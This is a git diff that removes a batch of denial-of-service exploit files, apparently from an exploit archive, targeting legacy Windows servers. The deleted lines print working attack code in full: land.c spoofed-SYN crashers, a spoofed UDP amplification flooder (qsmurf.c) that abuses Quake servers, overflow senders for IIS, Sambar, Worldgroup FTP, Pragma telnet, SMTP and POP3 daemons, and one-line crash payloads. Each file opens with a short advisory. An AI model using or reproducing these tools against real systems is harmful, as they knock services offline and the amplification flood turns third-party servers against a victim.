$denial\@localhost\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - -sub pakmail { -$victim=$args{h}; -$denial .= "A" x 1390; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "25") or die "Can't connect.\n"; -print $socket "MAIL FROM: test\@localhost\n"; -print $socket "RCPT TO: $denial\@localhost\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - -sub pakpop { -$victim=$args{h}; -$denial .= "A" x 1400; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "110") or die "Can't connect.\n"; -print $socket "user test\n"; -print $socket "pass $denial\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - -sub vulnerable { -print qq~ - ______________________________________________________________________________ - Vulnerable Daemon Version Vulnerable Daemon Version - ______________________________________________________________________________ - - [1] G6 FTP Server v2.0b4/5 [2] MDaemon httpd Server v2.8.5.0 - - [3] Avirt Mail Server v3.5 [4] BisonWare FTP Server v3.5 - - [5] Vermillion FTP Server v1.23 [6] ZetaMail SMTP Server v2.1 - - [7] WFTPD FTP Server v2.40 [8] BFTelnet Server v1.1 - - [9] Broker FTP Server v3.5 [10] ExpressFS FTP Server v2.x - -[11] XtraMail POP3 Server v1.11 [12] Cmail SMTP Server v2.4 - -[13] PakMail SMTP Server v1.25 [14] PakMail POP3 Server v1.25 - -~; exit; } - diff --git a/platforms/windows/remote/20403.txt b/platforms/windows/remote/20403.txt deleted file mode 100755 index 5ea76411b..000000000 --- a/platforms/windows/remote/20403.txt +++ /dev/null 
@@ -1,8 +0,0 @@ -source : http://www.securityfocus.com/bid/1941/info - - -Small HTTP Server is a full service web server. This utility is less than 30Kb and requires minimal system resources. - -Small HTTP Server is subject to a denial of service. When making an http request without a filename specified the server will attempt to locate index.html in that particular directory, if index.html does not exist the server will utilize a large amount of system memory . If numerous http requests, again structured without a filename, are sent to the web server, an attacker could cause the server to consume all system memory. A restart of the application is required in order to gain normal functionality. - -http://target/subdirectory/ \ No newline at end of file diff --git a/platforms/windows/remote/20656.txt b/platforms/windows/remote/20656.txt deleted file mode 100755 index 9e3ab1609..000000000 --- a/platforms/windows/remote/20656.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/2435/info - -It is possible for a remote user to cause a denial of service condition in Robin Twombly A1 Server. - -Submitting a specially crafted request via a telnet connection, could cause the A1 server to crash. - -A restart of the server is required in order to gain normal functionality. - -echo `perl -e 'print "A" x 1000'` | telnet target \ No newline at end of file diff --git a/platforms/windows/remote/20682.txt b/platforms/windows/remote/20682.txt deleted file mode 100755 index 3f696342a..000000000 --- a/platforms/windows/remote/20682.txt +++ /dev/null @@ -1,5 +0,0 @@ -source: http://www.securityfocus.com/bid/2468/info - -A denial of service condition exists in Michael Lamont Savant web server. Requesting a specially crafted URL composed of '%' characters could cause the server to stop responding. - -www.target/%%% \ No newline at end of file 
diff --git a/platforms/windows/remote/20728.txt b/platforms/windows/remote/20728.txt deleted file mode 100755 index 00be5bf44..000000000 --- a/platforms/windows/remote/20728.txt +++ /dev/null @@ -1,11 +0,0 @@ -source: http://www.securityfocus.com/bid/2543/info - -A denial of service vulnerability exists in versions of 602Pro Lan Suite. - -A remote attacker may connect to port 80 of the vulnerable host. Via this connection, the attacker submits a long request composed of at least 1033 characters. This excess input causes an overflows of the server's input buffer and crashes Lansuite.exe and all applicable services. - -GET / HTTP/1.1 -Proxy-Authorization:AAAAAAAAAAAAA..... - -Where A x 1033 or more characters, as long as its -over 1032, it will work. \ No newline at end of file diff --git a/platforms/windows/remote/20783.txt b/platforms/windows/remote/20783.txt deleted file mode 100755 index fa3624521..000000000 --- a/platforms/windows/remote/20783.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/2636/info - -"The Bat!" is an MUA for Windows by Rit Research Labs. - -"The Bat!" is vulnerable to a remote denial of service attack. Email messages in which carriage return (CR) characters are not followed by a linefeed (LF) can cause "The Bat!" to incorrectly interpret the message's structure. This can lead "The Bat!" to read text in the message body as a response from the POP3 server. The current (corrupt) message will not be deleted from the server, and the mail download process will stop. - -As a result, the user will remain unable to receive new email messages from the affected POP3 account. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20783.zip \ No newline at end of file diff --git a/platforms/windows/remote/20802.c b/platforms/windows/remote/20802.c deleted file mode 100755 index c2bc9334c..000000000 --- a/platforms/windows/remote/20802.c +++ /dev/null 
@@ -1,142 +0,0 @@ -source: http://www.securityfocus.com/bid/2654/info - -Microsoft Internet Information Server is vulnerable to a denial of service. - -This particular denial of service affects versions 2.0, 3.0 and 4.0 of the server prior to service pack 4. - -The URL which causes this issue is of the format "http://server/?anything=XXXXX" - note that no existing file need be requested. - -This is not a buffer overflow; a URL of specific length must be sent (between 4k and 8k), anything longer or shorter will not affect the server. - -/* Some days ago I found the page http://www.eden.com/~tfast/jihad.html - Then I found the java program IIServerSlayer.class made by - Todd Fast , the author of the web pages. - Now I have ported that program in gcc from java using strace and - disassembling IIServerSlayer.class with javap (part of jdk). - - For now is tested by me only on Linux 2.1.42 compiled with gcc 2.7.2.2 - and glibc. - by Andrea Arcangeli */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -int s; -struct sockaddr_in addr, spoofedaddr; -struct hostent *host; - -int open_sock(int sock, char *server, int port) { - struct sockaddr_in blah; - struct hostent *he; - bzero((char *)&blah,sizeof(blah)); - blah.sin_family=AF_INET; - blah.sin_port=htons(port); - if ((he = gethostbyname(server)) != NULL) { - bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length); - } - else { - if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) { - perror("gethostbyname()"); - return(2); - } - } - if (connect(sock,(struct sockaddr *)&blah,16)==-1) { - perror("connect()"); - close(sock); - return(3); - } - return 0; -} - -char *generate_die_string(int lenght) { - char letter='X'; - char *str_begin = "GET /?bye=",*str_end = " HTTP/1.0\r\n\r\n",*str; - int i; - str = (char *)malloc(lenght+strlen(str_end)+strlen(str_begin)+1); - strcpy(str,str_begin); - for(i=strlen(str_begin);i [string_lenght] [port]\n",argv[0]); - printf("[-v] = verbose mode to 
view the server reply\n"); - printf("[-f] = force running over non or patched IIS/3.0 web server\n"); - exit(0); - } - for(i=1;i param+2) lenght = atoi(argv[param+2]); - if(argc > param+3) port = atoi(argv[param+3]); - for(i=0;i<3;i++,lenght++) { - if(i) IIServerSlayer(argv[param+1],lenght,port,flags); - else IIServerSlayer(argv[param+1],0,port,flags); - if(i == 1 || i == 0) lenght--; - } - if((pid = fork())) { - if(pid == -1) { - perror("I can' t fork\n"); - exit(-1); - } - usleep(60000000); /* wait for 1 minute */ - kill(pid,SIGTERM); - } - else { - IIServerSlayer(argv[param+1],lenght,port,flags); - printf("Sorry, %s is alive yet\n",argv[param+1]); - } - exit(0); -} - - - - diff --git a/platforms/windows/remote/20812.c b/platforms/windows/remote/20812.c deleted file mode 100755 index b1b892c43..000000000 --- a/platforms/windows/remote/20812.c +++ /dev/null 
@@ -1,127 +0,0 @@ -source: http://www.securityfocus.com/bid/2666/info - -A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. - -It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. - -**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. 
- -/* land.c by m3lt, FLC - crashes a win95 box */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -struct pseudohdr -{ - struct in_addr saddr; - struct in_addr daddr; - u_char zero; - u_char protocol; - u_short length; - struct tcphdr tcpheader; -}; - -u_short checksum(u_short * data,u_short length) -{ - register long value; - u_short i; - - for(i=0;i<(length>>1);i++) - value+=data[i]; - - if((length&1)==1) - value+=(data[i]<<8); - - value=(value&65535)+(value>>16); - - return(~value); -} - -int main(int argc,char * * argv) -{ - struct sockaddr_in sin; - struct hostent * hoste; - int sock; - char buffer[40]; - struct iphdr * ipheader=(struct iphdr *) buffer; - struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr)); - struct pseudohdr pseudoheader; - - fprintf(stderr,"land.c by m3lt, FLC\n"); - - if(argc<3) - { - fprintf(stderr,"usage: %s IP port\n",argv[0]); - return(-1); - } - - bzero(&sin,sizeof(struct sockaddr_in)); - sin.sin_family=AF_INET; - - if((hoste=gethostbyname(argv[1]))!=NULL) - bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length); - else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1) - { - fprintf(stderr,"unknown host %s\n",argv[1]); - return(-1); - } - - if((sin.sin_port=htons(atoi(argv[2])))==0) - { - fprintf(stderr,"unknown port %s\n",argv[2]); - return(-1); - } - - if((sock=socket(AF_INET,SOCK_RAW,255))==-1) - { - fprintf(stderr,"couldn't allocate raw socket\n"); - return(-1); - } - - bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr)); - ipheader->version=4; - ipheader->ihl=sizeof(struct iphdr)/4; - ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr)); - ipheader->id=htons(0xF1C); - ipheader->ttl=255; - ipheader->protocol=IP_TCP; - ipheader->saddr=sin.sin_addr.s_addr; - ipheader->daddr=sin.sin_addr.s_addr; - - tcpheader->th_sport=sin.sin_port; - tcpheader->th_dport=sin.sin_port; - tcpheader->th_seq=htonl(0xF1C); - tcpheader->th_flags=TH_SYN; - 
tcpheader->th_off=sizeof(struct tcphdr)/4; - tcpheader->th_win=htons(2048); - - bzero(&pseudoheader,12+sizeof(struct tcphdr)); - pseudoheader.saddr.s_addr=sin.sin_addr.s_addr; - pseudoheader.daddr.s_addr=sin.sin_addr.s_addr; - pseudoheader.protocol=6; - pseudoheader.length=htons(sizeof(struct tcphdr)); - bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr)); - tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr)); - - if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct -sockaddr_in))==-1) - { - fprintf(stderr,"couldn't send packet\n"); - return(-1); - } - - fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]); - - close(sock); - return(0); -} - - diff --git a/platforms/windows/remote/20814.c b/platforms/windows/remote/20814.c deleted file mode 100755 index 53deb71b6..000000000 --- a/platforms/windows/remote/20814.c +++ /dev/null 
@@ -1,139 +0,0 @@ -source: http://www.securityfocus.com/bid/2666/info - -A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. - -It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. - -**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. - -#define _BSD_SOURCE - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -/* -Windows Server 2003 and XP SP2 remote DoS exploit -Tested under OpenBSD 3.6 at WinXP SP 2 -Vuln by Dejan Levaja -(c)oded by __blf 2005 RusH Security Team , http://rst.void.ru -Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor -Fuck lamerz: Saint_I, nmalykh, Mr. Clumsy -All rights reserved. 
-*/ - -//checksum function by r0ach -u_short checksum (u_short *addr, int len) -{ -u_short *w = addr; -int i = len; -int sum = 0; -u_short answer; -while (i > 0) -{ -sum += *w++; -i-=2; -} -if (i == 1) sum += *(u_char *)w; -sum = (sum >> 16) + (sum & 0xffff); -sum = sum + (sum >> 16); -return (~sum); -} -int main(int argc, char ** argv) -{ -struct in_addr src, dst; -struct sockaddr_in sin; -struct _pseudoheader { -struct in_addr source_addr; -struct in_addr destination_addr; -u_char zero; -u_char protocol; -u_short length; -} pseudoheader; -struct ip * iph; -struct tcphdr * tcph; -int mysock; -u_char * packet; -u_char * pseudopacket; -int on = 1; -if( argc != 3) -{ -fprintf(stderr, "r57windos.c by __blf\n"); -fprintf(stderr, "RusH Security Team\n"); -fprintf(stderr, "Usage: %s \n", argv[0]); -return EX_USAGE; -} -if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL) -{ -perror("malloc()\n"); -return EX_OSERR; -} -inet_aton(argv[1], &src); -inet_aton(argv[1], &dst); -iph = (struct ip *) packet; -iph->ip_v = IPVERSION; -iph->ip_hl = 5; -iph->ip_tos = 0; -iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr)); -iph->ip_off = htons(IP_DF); -iph->ip_ttl = 255; -iph->ip_p = IPPROTO_TCP; -iph->ip_sum = 0; -iph->ip_src = src; -iph->ip_dst = dst; -tcph = (struct tcphdr *)(packet +sizeof(struct ip)); -tcph->th_sport = htons(atoi(argv[2])); -tcph->th_dport = htons(atoi(argv[2])); -tcph->th_seq = ntohl(rand()); -tcph->th_ack = rand(); -tcph->th_off = 5; -tcph->th_flags = TH_SYN; // setting up TCP SYN flag here -tcph->th_win = htons(512); -tcph->th_sum = 0; -tcph->th_urp = 0; -pseudoheader.source_addr = src; -pseudoheader.destination_addr = dst; -pseudoheader.zero = 0; -pseudoheader.protocol = IPPROTO_TCP; -pseudoheader.length = htons(sizeof(struct tcphdr)); -if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL) -{ -perror("malloc()\n"); -return EX_OSERR; -} -memcpy(pseudopacket, &pseudoheader, 
sizeof(pseudoheader)); -memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr)); -tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr)); -mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW); -if(!mysock) -{ -perror("socket!\n"); -return EX_OSERR; -} -if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) -{ -perror("setsockopt"); -shutdown(mysock, 2); -return EX_OSERR; -} -sin.sin_family = PF_INET; -sin.sin_addr = dst; -sin.sin_port = htons(80); -if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1) -{ -perror("sendto()\n"); -shutdown(mysock, 2); -return EX_OSERR; -} -printf("Packet sent. Remote machine should be down.\n"); -shutdown(mysock, 2); -return EX_OK; -} diff --git a/platforms/windows/remote/20830.txt b/platforms/windows/remote/20830.txt deleted file mode 100755 index ef4e9a3c6..000000000 --- a/platforms/windows/remote/20830.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/2704/info - -Versions of Jana Server are vulnerable to a denial of service attack. - -It is possible to remotely crash a system running Jana Server by submitting a URL request which specifies an MS-DOS devicename. - -A hard reboot of the exploited server will be required to restore web services. - -www.example.com/aux \ No newline at end of file diff --git a/platforms/windows/remote/20904.pl b/platforms/windows/remote/20904.pl deleted file mode 100755 index 1db094137..000000000 --- a/platforms/windows/remote/20904.pl +++ /dev/null 
@@ -1,33 +0,0 @@ -source: http://www.securityfocus.com/bid/2834/info - -Pragma InterAccess for Microsoft 95/98 is a fully-featured commercial Telnet server. - -Pragma InterAccess does not adequately compensate for large bursts of data being sent to port 23(telnet). If an excessive amount of characters(15000+) are sent to this port then the program will terminate and telnet services will shut down on that host. The daemon must be restarted to regain functionality. - -This may be due to a buffer overflow condition. If this is the case, it may be possible for attackers to execute arbitrary code on the target host. - -#!/usr/bin/perl -# -# PI.PL - Crashes Pragma Interaccess 4.0 Server -# Written by nemesystm of the DHC -# http://dhcorp.cjb.net - neme-dhc@hushmail.com -# -#### -use Socket; - -die "$0 - Crashes Pragma Interaccess 4.0 Server. -written by nemesystm of the DHC -http://dhcorp.cjb.net - neme-dhc\@hushmail.com -usage: perl $0 target.com\n" if !defined $ARGV[0]; - -$serverIP = inet_aton($ARGV[0]); -$serverAddr = sockaddr_in(23, $serverIP); -socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp')); -if (connect (CLIENT, $serverAddr)) { - for ($count = 0; $count <= 15000; $count++) { - send (CLIENT, "A",0); - } - close (CLIENT); -} else { die "Can't connect.\n"; } -print "Done.\n"; - diff --git a/platforms/windows/remote/21016.c b/platforms/windows/remote/21016.c deleted file mode 100755 index d4de6b0e3..000000000 --- a/platforms/windows/remote/21016.c +++ /dev/null 
@@ -1,229 +0,0 @@ -source: http://www.securityfocus.com/bid/3060/info - - -Quake 3 network play features contain a remotely exploitable denial of service vulnerability. - -A hostile client program can be used by to generate a large number of forged client queries on behalf of a target user. The server's responses flood the target user, consuming the target system's network bandwidth and CPU cycles. - -It has been reported that other games suffer from similar issues. Additional amplification attacks may be possible through the usage of commands which return detailed information about the game status or server information. In some cases, packets larger than 500 bytes may be sent in response to a 50 byte spoofed UDP packet. - -/* - qsmurf.c - Written by Jamal Motsa (Haul@EFnet), based on qflood.c by Andy Gavin (_k3nny@EFnet, k@ETG) - Look at his original post for the original credits. - The anti-script kiddie file descriptor bug has been removed and the code was cleaned up a lot. - - This works based on the fact that when a Quake client connects to a Quake server, much more data - is received by the client than is sent. This program will spoof connections from a target (source - IP Address) to NetQuake servers, which will reply to the target with lots of data with an - amplification rate approaching 20:1. - - Greets to: - Sean Stanek (vulture@EFnet) for doing most of the code optimization. - SFS, WHHS, Marlboro, the Shao Lin - Lithium Node and channel regulars, TPC, X-Tommy, the defunct #BrainFreze Jeff, NEO, Kwizatz@RURC - Sang, zuez, dead-sexy.com and crew, #phear on EFnet, AY, Eric R. 
for providing me with DNS - - And a big middle finger to: - BTA (for being quite possibly the worse Quake 3 clan in history) - anyone who packets EFnet servers - and finally, to whoever framed OJ -*/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -struct sockaddr sa; -struct node -{ - char *address; - struct node *next; - unsigned int ip; -}; - -struct node *head = NULL; -struct node *tail; - -void add_address( struct node **, char * ); -void sig_handler( int ); - -int main( int argc, char **argv ) -{ - int x = 1; - int source_port, delay, fd; - unsigned int ip; - struct sockaddr_in *p; - struct hostent *he; - struct node *current; - char *temp; - - u_char thePACKET[41]= - { - 0x45, /* IP version, header len */ - 0x00, /* IP diff services field */ - 0x00, 0x29, /* IP total length */ - 0xc2, 0xb5, /* IP id */ - 0x00, 0x00, /* IP fragment offset */ - 0x80, /* IP TTL */ - 0x11, /* IP protocol */ - 0, 0, /* IP header checksum */ - 0, 0, 0, 0, /* IP src */ - 0, 0, 0, 0, /* IP dest */ - 0x00, 0x00, /* UDP src port */ - 0, 0, /* UDP dest port */ - 0x00, 0x15, /* length = 21 */ - 0x00, 0x00, /* UDP checksum */ - 0x80, 0x00, /* Quake flags */ - 0x00, 0x0d, /* Quake length */ - 0x01, /* Quake command = connect */ - 0x51, 0x55, 0x41, 0x4b, /* Quake game = QUAKE */ - 0x45, 0x00, - 0x03, 0x01 /* Quake version = 3 */ - }; - - if( argc != 5 ) - { - fprintf( stderr, "\nqsmurf - floods targets with amplified UDP packets using the NetQuake protocol\n" ); - fprintf( stderr, "\tWritten by Jamal Motsa (Haul@EFnet)\n" ); - fprintf( stderr, "\tUsage: %s \n", *argv ); - fprintf( stderr, "\t\tservers = comma-delimited list of IP Address/hostnames of Quake servers\n" ); - fprintf( stderr, "\t\tsrc = IP Address/hostname of target\n" ); - fprintf( stderr, "\t\tserver_port = Quake server port\n" ); - fprintf( stderr, "\t\tdelay = delay between connection requests (in usec, 0 for 
no delay)\n" ); - fprintf( stderr, "\t\texample: %s 10.0.0.2,10.0.0.3 10.0.0.10 26000 50000\n\n", argv[0] ); - exit( 0 ); - } - - srand( time( NULL )); - delay = atoi( argv[4] ); - - /* build a linked list of addresses entered on command line */ - temp = strtok( argv[1], "," ); - add_address( &head, temp ); - - signal( SIGINT, sig_handler ); - - tail = head; - - temp = strtok( NULL, "," ); - while( temp != NULL ) - { - add_address( &(tail->next), temp ); - tail = tail->next; - temp = strtok( NULL, "," ); - } - - current = head; - - if(( fd=socket( AF_INET, SOCK_RAW, IPPROTO_RAW )) == -1 ) - { - perror( "Can't create raw socket (you must run as root)" ); - exit( 0 ); - } - - if( setsockopt( fd, IPPROTO_IP, IP_HDRINCL, (char*)&x, sizeof(x)) < 0 ) - { - perror( "setsockopt IP_HDRINCL error" ); - exit( 0 ); - } - - if( ( he = gethostbyname( argv[2]) ) == NULL ) - { - fprintf( stderr, "Can't resolve src\n" ); - exit( 0 ); - } - - bcopy( *( he->h_addr_list ), &ip, 4 ); - - - while( 1 ) - { - while( current != NULL ) - { - bcopy( &ip, ( thePACKET + 16 ), 4 ); - bcopy( &(current->ip), ( thePACKET + 16 ), 4 ); - - source_port = rand() % 3976 + 1024; - - *(u_short*)(thePACKET + 20) = htons( (u_short) source_port ); - *(u_short*)(thePACKET + 22) = htons( (u_short) atoi( argv[3] )); - - p = ( struct sockaddr_in* ) &sa; - p->sin_family = AF_INET; - bcopy( ¤t->ip, &(p->sin_addr), 4 ); - - if(( sendto( fd, &thePACKET, sizeof(thePACKET), 0, (struct sockaddr*)p, sizeof(struct sockaddr ))) == -1) - { - perror( "sendto error" ); - exit( 0 ); - } - - printf( "Quake connection request sent from %s:%i to %s:%s\n", argv[2], source_port, current->address, -argv[3] ); - - if( delay > 0 ) usleep( delay ); - current = current->next; - } - current = head; - } - exit( 1 ); -} - -void add_address( struct node** reference, char *data ) -{ - struct hostent * he; - struct node* new_node = malloc( sizeof( struct node )); - - new_node->address = data; - new_node->next = *reference; - - if( ( he = 
gethostbyname( new_node->address )) == NULL ) - { - fprintf( stderr, "Can't resolve server\n"); - exit( 0 ); - } - bcopy( *( he->h_addr_list ), &(new_node->ip), 4 ); - - *reference = new_node; -} - -void sig_handler( int number ) -{ - struct node *current = head; - struct node *next; - - printf( "\nCaught SIGINT. Cleaning up memory..." ); - while( current != NULL ) - { - next = current->next; - free( current ); - current = next; - } - printf( "done.\n\n" ); - exit( 1 ); -} - - - - - - - - - - - diff --git a/platforms/windows/remote/21040.txt b/platforms/windows/remote/21040.txt deleted file mode 100755 index 8ab61dba2..000000000 --- a/platforms/windows/remote/21040.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/3113/info - -A potential denial of service vulnerability exists in some versions of the Microsoft Windows network stack. - -The problem occurs when a large number of extraneous ARP packets sent to a host running Windows. This can cause the system to use all available CPU and memory resources and thus become unresponsive until the attack ends. - -By sending ARP requests to the Ethernet broadcast address, it may be possible to use this attack to disable an entire network. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21040.tar.gz \ No newline at end of file diff --git a/platforms/windows/remote/21228.c b/platforms/windows/remote/21228.c deleted file mode 100755 index 6cc88e859..000000000 --- a/platforms/windows/remote/21228.c +++ /dev/null 
@@ -1,102 +0,0 @@ -source: http://www.securityfocus.com/bid/3885/info - -Sambar Server is a multi-threaded web server which will run on Microsoft Windows 9x/ME/NT/2000 operating systems. - -It is possible to cause a denial of service to Sambar Server by sending consecutive excessively long requests to the 'cgitest.exe' sample script. - -The possibility exists that this issue may be the result of improper bounds checking. As a result, this vulnerability may potentially be used to execute arbitrary code on the host running the vulnerable software. Though this has not been confirmed. - -While this issue was reported for Sambar Server 5.1, other versions may also be affected. - -/********************************************************************* -********** -** -** 06.02.2002 - GREETZ TO WbC-BoArD & YAST CREW - -** -** Compiled with gcc under linux with kernel 2.4.17 - -** -** Programname: Sambar Server 5.0 Manufacturer:Jalyn - -** -********************************************************************** -*********/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define SERVER_PORT 80 -#define MAX_MSG 100 - - int sd, rc, i,j; - char buf[5000]; - char msgtosnd[5024]; - char msgtoget[102400]; - char source[200000]; - struct sockaddr_in localAddr, servAddr; - struct hostent *h; - FILE *f1; - -int main (int argc, char *argv[]) { -printf("Sleepy of Yast presents \"Sambar Server Production 5.0 -Crasher\"\n"); -if(argc != 2) -{ -printf(">>> usage: %s ",argv[0]);exit(0); -}; -h = gethostbyname(argv[1]); -if(h==NULL) -{ -printf("%s: unknown host '%s'\n",argv[0],argv[1]); -exit(1); -} -servAddr.sin_family = h->h_addrtype; -memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], -h->h_length); -servAddr.sin_port = htons(SERVER_PORT); -sd = socket(AF_INET, SOCK_STREAM, 0); -if(sd<0) -{ -perror("cannot open socket "); -exit(1); -} - -localAddr.sin_family = AF_INET; -localAddr.sin_addr.s_addr = htonl(INADDR_ANY); 
-localAddr.sin_port = htons(0); -rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr)); - -if(rc<0) -{ -printf("%s: cannot bind port TCP %u\n",argv[0],SERVER_PORT); -perror("error "); -exit(1); -} -rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr)); -if(rc<0) -{ -perror("cannot connect "); -exit(1); -}; -strcpy(buf,"A"); -fprintf(stderr,"Entering Loop\n"); -for(i=1;i<4000;i++) -{ -strcat(buf,"A"); -} -sprintf(msgtosnd,"GET /cgi-win/cgitest.exe?%s HTTP/1.1\nhost: -localhost\n\n\n",buf); -for(j=0;j<5;j++) -{ -send(sd,msgtosnd,5024,0); -} -printf("\n\n BOOOOM"); -} diff --git a/platforms/windows/remote/21305.c b/platforms/windows/remote/21305.c deleted file mode 100755 index 1d47052ce..000000000 --- a/platforms/windows/remote/21305.c +++ /dev/null 
@@ -1,112 +0,0 @@ -source: http://www.securityfocus.com/bid/4185/info - - -Galacticomm Worldgroup is a community building package of both client and server software for Microsoft Windows. Worldgroup is based on BBS software, and includes web and ftp servers. - -A vulnerability has been reported in the FTP server included with Worldgroup. If a LIST command is received by the server including a long string of '*/../' characters, the server may halt. A restart may be required in order to regain normal functionality. - -Earlier versions of Worldgroup may share this vulnerability. - -/* - by Limpid Byte project - http://lbyte.void.ru - lbyte@host.sk - -[Worldgroup FTP Server Denial of Service] -More than 105 "/" in LIST command. - -*/ - -#include -#include -#include -#include - -#define FOUND "220" - -int main(int argc, char *argv[]) -{ - int sock; - struct sockaddr_in blah; - struct hostent *he; - char cgiBuff[1024]; - char *cgiPage[6]; - WSADATA wsaData; - char cr[] = "\n"; - - if (argc < 3) - { -printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThis program crash Worldgroup servers 3.xx for windows 95/98/ME/NT/2K."); -printf("\n\rGreets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\n\r USAGE:\n\r"); -printf("Ftp_dos.exe [HOST] [LOGIN] [PASSWORD] "); -printf("\n\r example : fpt_dos.exe 127.0.0.1 anonymous anonymous@127.0.0.1 \n"); - exit(1); - } - cgiPage[0] = "USER "; - cgiPage[1] = (argv[2]); - cgiPage[2] = "PASS "; - cgiPage[3] = (argv[3]); - cgiPage[4] = "PASV"; - cgiPage[5] = "LIST */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../\n"; - - if(WSAStartup(0x101,&wsaData)) - { - printf("Unable to initialize WinSock lib.\n"); - exit(1); - } -printf("Let's crash the World!\n\r"); -printf("Coded by the [eaSt]:\n\r"); -printf("\nConnecting %s on port 21...\n\n", argv[1]); - - sock = socket(AF_INET,SOCK_STREAM,0); - blah.sin_family=AF_INET; - blah.sin_addr.s_addr=inet_addr(argv[1]); - blah.sin_port=htons(21); 
- if ((he = gethostbyname(argv[1])) != NULL) - { - memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length); - } - else - { - if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE) - { - WSACleanup(); - exit(1); - } - } - - if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0) - { - WSACleanup(); - exit(1); - } - memset(cgiBuff, 0, sizeof(cgiBuff)); - cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0; - printf("<< %s", cgiBuff); - send(sock,cgiPage[0],strlen(cgiPage[0]),0); - send(sock,cgiPage[1],strlen(cgiPage[1]),0); - send(sock,cr,1,0); - memset(cgiBuff, 0, sizeof(cgiBuff)); - cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0; - printf(">> %s %s\n<< %s", cgiPage[0], cgiPage[1], cgiBuff); - send(sock,cgiPage[2],strlen(cgiPage[2]),0); - send(sock,cgiPage[3],strlen(cgiPage[3]),0); - send(sock,cr,1,0); - memset(cgiBuff, 0, sizeof(cgiBuff)); - cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0; - printf(">> %s %s\n<< %s", cgiPage[2], cgiPage[3], cgiBuff); - send(sock,cgiPage[4],strlen(cgiPage[4]),0); - send(sock,cr,1,0); - memset(cgiBuff, 0, sizeof(cgiBuff)); - cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0; - printf(">> %s\n<< %s", cgiPage[4], cgiBuff); - 